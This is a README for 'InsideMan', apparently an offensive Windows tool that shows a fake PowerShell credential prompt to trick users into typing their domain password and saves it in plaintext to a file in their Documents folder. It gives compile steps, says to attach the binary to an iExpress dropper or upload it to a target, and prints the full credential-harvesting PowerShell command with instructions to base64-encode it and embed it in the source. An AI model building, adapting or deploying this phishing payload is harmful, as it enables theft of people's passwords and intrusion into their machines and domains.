README.md 1.3 KB

InsideMan is an internal Windows phishing executable that utilizes Powershell Get-Credential calls in an attempt to coerce the user into typing thier plaintext password into the prompt. The plaintext password is then written to a file named windows32.txt located in the user's Documents directory.

This is not a sophisticated attack. Might set off an alarm or two with advanced EDR looking for abnormal powershell calls.

USAGE:

Use gcc to compile the cpp file. gcc.exe insideman.cpp -o insideman.exe

Attach to a dropper with iExpress or upload to target.

Plaintext password is stored at C:\Users\$user\Documents\windows32.txt on the target machine.

ROLL YOUR OWN:

1). Open Powershell and copy the command below (Change text/output path as needed for specific pretexts):

$str= '$sessionCredential = $host.ui.PromptForCredential("Authentication Required", "Please Enter Your Domain Username and Password:", "$env:UserDomain\$env:USERNAME", ""); $mpass = [System.Net.NetworkCredential]::new("",$sessionCredential.password).Password; $user = $env:USERNAME; $mpass > C:\Users\user\Documents\windows32.txt'

2.) Translate To Base64

3.) Paste Base64 Output to Base64 String In InsideMan.cpp

4.) Compile

gcc.exe insideman.cpp -o insideman.exe